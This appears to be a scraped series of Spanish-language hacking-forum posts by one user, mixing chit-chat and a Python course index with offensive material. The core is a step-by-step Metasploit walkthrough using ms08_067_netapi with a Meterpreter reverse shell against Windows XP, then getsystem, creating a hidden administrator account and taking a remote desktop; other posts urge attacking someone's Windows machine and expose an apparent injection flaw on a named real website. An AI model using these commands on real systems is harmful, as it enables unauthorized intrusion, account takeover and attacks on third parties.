¡Gracias!
Me los bajo y a la nube me los subo por si algún día los necesito.
Saludos.

Me gusta la idea del post ((:

La verdad es que ahora ya no suelo utilizar ningún Add-on, pero cuando los utlizaba, uno que me ahorraba escribir varios vectores de XSS se llamaba rightclickxss creo que ande por el 0.2 de versión. Es simple, te añade en el menú del clic derecho una opción de "insert XSS" la cual tiene unos quince vectores.

Si queréis usar navegadores ya preparados para testear webs utilizad el proyecto MANTRA de OWASP: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos ((:

De nada si te sirvió.
Claro que se puede realizar con Windows 7, todo depende del exploit que utilices, creo recordar que el Framework anda por los mil y algo exploits, busca alguno para el Windows 7 que desees atacar, reza un poco y con suerte lo tendrás.
Saludos ((:

Si es un Windows XP quizá te sirva el exploit de Netapi, lánzalo con Metasploit y con un payload Meterpreter para asegurarte estar dentro de su equipo, aquí hay un vídeo que te orientará:

Y si quieres obtener una sesión gráfica una vez estés dentro aquí te dejo un vídeo mío:


Pásale un Nmap básico para darnos más datos del equipo. Un ejemplo sería: nmap -O suIPlocal

Saludos ((:

Hola comunidad, se me ha ocurrido hacer una especie de glosario en el que cada usuario pueda compartir sus trucos a la hora de aprender a programar en un lenguaje determinado y el por qué de ellos.
Todo tip será aceptado, no tienen por qué ser expertos en el lenguaje.
El glosario constará de estas partes:

• Lenguaje o lenguajes para los que sirve
• Explicación breve o extensa
• Pros y contras del mismo
• Algún ejemplo donde se vea su utilidad (Opcional)

Saludos y espero que colaboren para que todos podamos aprender cuantos más lenguajes mejor. ((:

Este es bueno, pero lo reporté yo hace ya meses y siquiera obtuve respuesta. Te lo muevo directo al Show Off. ((:

Yo reinstalaría el metasploit desde el paquete *.bundle, o como en tu caso, me lo bajaría, ya que en BT viene ya instalado y luego con un msfupdate todo listo..

Creo que también tenga SQLi, mira:
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Respuesta:

CitarWarning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:

Creo que te refieres a esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Siento que el enlace no sea de este foro, pero no encontré ese post por aquí. Espero que te sirva de ayuda.
Saludos ((:

¡Tremendo hdbreaker!
Lo que más me ha gustado el apartado de la ingeniería social, jajajaja.

Aunque he echado en falta en los vectores de evasión el ya mítico alert(String.fromCharCode(88, 83, 83))

Saludos. ((:

Si quieres algún escáner de vulnerabilidades te recomendaría el W3af o Skipfish (creado por San GOOGLE), pero como dijo Sanko, no los uses, no reportan ni la mitad de fallos de seguridad, dan falsos positivos, generan demasiado tráfico (lo que conlleva que se enteren de la posible intrusión o intento) y demoran demasiado.

Un saludo ((:

Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Buenas, en este post se muestra al proceso mediante el cual se accede a un Windows XP SP3 en una red LAN desde metasploit, se obtiene una sesión con meterpreter en el sistema y luego se añade un usuario con privilegios de administrador al sistema. Por último se obtiene una GUI remota, lo que podría facilitar determinadas acciones.
Si luego se quieren eliminar rastros una de las cosas más importantes es eliminar desde meterpreter el usuario creado.

Para esta práctica se utilizan:
   - BackTrack 5 R3
   - Windows XP SP3 virtualizado en VMWare Player

En todo momento se deben sustituir los valores:

   "miIP" por vuestra IP Local
   "suIP" por la IP de la máquina a vulnerar
   "tuusuario" por el nombre de usuario que elijas
   "tupass" por la contraseña que elijas

Una vez presentado el entorno, aquí van los pasos:
   1- Comprobar la máquina vulnerada, para hacerlo de forma rápida se utilizará nmap. Sintaxis: nmap -O suIP
   2- Una vez comprobado, ejecutar la consola de Metasploit. Sintaxis: msfconsole
   3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb. Sintaxis: use exploit/windows/smb/ms08_067_netapi
   4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa. Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp
   5- Se coloca la IP local. Sintaxis: set LHOST miIP
   6- Se coloca la IP remota. Sintaxis: set RHOST suIP
   7- Comprobar que no queden campos vacíos (opcional). Sintaxis: show options
   Debe salir algo así:

Citarmsf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.153    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.102    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Nota: los campos de las IP deben ser los vuestros
   8- Lanzar el exploit. Sintaxis: exploit
   9- Una vez en meterpreter se obtiene el sistema. Sintaxis: getsystem
   10- Una vez tenemos privilegios hay que crear un nuevo usuario. sintaxis: run getgui -u tuusuario -p tupass -e
   11- Obtenemos una shell en el sistema. Sintaxis: shell
   12- Elevar privilegios al usuario. Sintaxis: net localgroups administradores tuusuario /add    Donde administradores es el nombre del grupo de admins.
   13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop. Sintaxis: rdesktop -u tuusuario -p tupass suIP

Y se abre una ventana con la GUI.



Un saludo ((:

Buenas a todos, les traigo un curso bastante bueno de Python en el que se inicia el aprendizaje desde cero. Lo encontré tirado por mi disco duro externo así que no tengo la fuente, si alguien la conoce que la ponga en un comentario y edito ((:

El curso se divide en tres etapas

TÍTULO: Aprender Python desde cero
AUTOR: Ricardo Navaja
Descripción: curso orientado al aprendizaje del lenguaje Python desde un nivel nulo hasta capacidades básicas. Se divide en tres etapas:

ETAPA I:
   0. Aprendiendo a programar en Python desde cero
   1. Ejecutando e importando módulos
   2. Practicando importar módulos y keys útiles
   3. Objetos, números y operaciones
   4. Más números y operaciones
   5. Strings
   6. Strings, secuencias de escape
   7. Strings en acción
   8. Strings de formato avanzado
   9. Métodos en strings (+ anexo registro de WING)
   10. Más strings y métodos
   11. Listas (+ anexo módulos para listas)
   12. Diccionarios (+ anexo diccionarios)
   13. Tuplas
   14. Archivos (+ anexo métodos para archivos)
   15. Comparaciones
   16. Declaraciones y asignaciones
   17. Declaraciones, print e if
   18. Declaraciones, while, break, continue, for, input, raw_input
   19. Funciones
   20. Funciones, variables locales y globales
   21. Funciones, pasando argumentos, share
   22. Funciones, pasando argumentos de forma especial
   23. Funciones, ejemplos
   24. Funciones avanzadas lambda
   25. Funciones avanzadas, apply-map-filter-reduce
   26. Última parte de funciones yield-iter
   27. Módulos I
   28. Modulos II
   29. Clases
   30. Clases - subclases
   31. Clases - detalle
   32. Clases - interceptando operadores de python
   33. Clases - finalizando la Etapa I

ETAPA II:
   1. Introducción, la primera tarea
   2. Guardando los datos
   3. Módulos complementarios
   4. Usando Pickles
   5. Usando shelves o estantes
   6. Usando OOP
   7. Agregando interfases, consola interactiva
   8. Introducción a Tkinter
   9. Agregando una interfase web
   10. CWD e import search path, argumentos, empezando redirección
   11. OS y SYS
   12. Profundicemos en el módulo SYS
   13. Profundicemos en el módulo OS
   14.CWD e import search path, argumentos, empezando redirección
   15. Encadenando programas con pipas
   16. Más redirección y encadenamiento
   17. Redireccionando streams a objetos, módulo StringIO OS,Popen
   18. Herramientas y archivos de directorio
   19. Más herramientas y archivos de directorio
   20. Herramientas de directorios
   21. Herramientas de trabajo paralelo, forking-os.exec
   22. Herramientas de trabajo paralelo, threads, locks
   23. Herramientas de trabajo paralelo, threads, threading y queue
   24. Salida o finalización de un programa, exit threads
   25. Comunicación entre procesos, pipes anónimos y con nombre
   26. Signals, otras formas de correr programas
   27. Ejemplos de utilidades en Python, Splitter & Joiner
   28. Comenzando con GUI's en profundidad, primeros pasos en Tkinter
   29. Paso a paso con Tkinter
   30. Agreguemos botones y las funciones call back
   31. Agreguemos múltiples widgets
   32. Usando clases en Tkinter
   33. Tipos de widgets en Tkinter
   34. Configurando widgets
   35. Ventanas top level
   36. Diálogos en Tkinter
   37. Usando bind más profundamente
   38. Usando message y entry
   39. Más sobre entry, variables Tkinter
   40. CheckButton, RadioButton y Scale
   41. GUI's desde la consola
   42. Corriendo código de GUI's, tres formas
   43. Imágenes en Tkinter
   44. Viendo y procesando imágenes con PIL
   45. Menús top Level
   46. Frames básicos, MenuButtons y OptionMenus
   47. Listboxes y scrollbars
   48. Text Widget
   49. Canvas Widget I
   50. Canvas Widget II
   51. GRID
   52. Akgunas herramientas adicionales de Tkinter, After, Pausas
   53. Moviendo y animando dentro de una GUI

ETAPA III:
   1. Internet
   2. Programando Sockets
   3. Probando sockets en forma remota
   4. Server, manejando múltiples clientes a la vez
   5. Usando sockets para crear un servidor de archivos simple
   6. FTP, transfiriendo archivos con FTPlib
   7. Usando URLlib para bajar archivos
   8. Más sobre FTPlib
   9. Procesando mails - POP
   10. Procesando mails - SMTP
   11. Módulo email parseando y componiendo mails
   12. PyMail, un cliente mail desde la consola
   13. NNTP accediendo a los newsgroups
   14. HHTP Accediendo a webs
   15. Usando URLlib en HTTP
   16. CGI Scripts, introducción
   17. Comenzando con los ejemplos de CGI
   18. Más ejemplos de CGI
   19. Más de CGI, agregando interacción con el usuario
   20. CGI, cada vez más realista
   21. Más CGI scripts, otros tipos de entrada
   22. Manejando datos en CGI Scripts-Cookies
   23. Python server pages PSP


De momento lo he subido a 4shared pero lo subiré a más servidores por si lo borran.
Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Link2: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (El primero esta caido)
Aclaro que los documentos no están muy bien redactados, aunque sí que explica todo muy bien, "pega patadas al diccionario" de vez en cuando. Si os gusta la lectura a veces os sangrarán los ojos. El que avisa no es traidor ((:

PD: todo el post ha sido completamente redactado por mí.

Si no se ve: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Buen reto, la corté por la IP
Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como ya te dije en su día, un grupo de WhatsApp estaría bastante bien, la pega es que la gente no querrá dar sus números y que hay límite de integrantes (20 ó 25 si no lo recuerdo mal).
Si se encuentra una forma de paliar el límite con alguna APP parecida y multiplataforma y la gente está dispuesta a dar su número de teléfono le veo futuro al grupo.

Saludos ((:

Line, es mejor que Whatsapp y se puede instalar en el PC...

Como ya he dicho queridos todos: con alguna APP parecida y multiplataforma

Leed.

Como ya te dije en su día, un grupo de WhatsApp estaría bastante bien, la pega es que la gente no querrá dar sus números y que hay límite de integrantes (20 ó 25 si no lo recuerdo mal).
Si se encuentra una forma de paliar el límite con alguna APP parecida y multiplataforma y la gente está dispuesta a dar su número de teléfono le veo futuro al grupo.

Saludos ((:

Yo también de España, como Sanko, estoy de acuerdo con todo lo que ha dicho, pero añadiría:
    - Donde los jóvenes viven por y para el fútbol, donde los demás deportes quedan de lado.

¡Tremendo ANTRAX! Estoy en informática en clase, cuando vaya a casa me lo leo y te digo, ¡pinta muy bueno!
Espero que salgan más entregas pronto
Saludos y GRACIAS

Edito: MUY BUENAS! Ya he vuelto a casa y lo he revisado, todos los ejercicios perfectos, deberes hechos jajajaja.
ESPERO LA SEGUNDA ENTREGA ((:

¡Foo Fighters!
Las de Hardwell también me gustan, pero para fiesta jajajaja. El Regguetón LO ODIO
Saludos.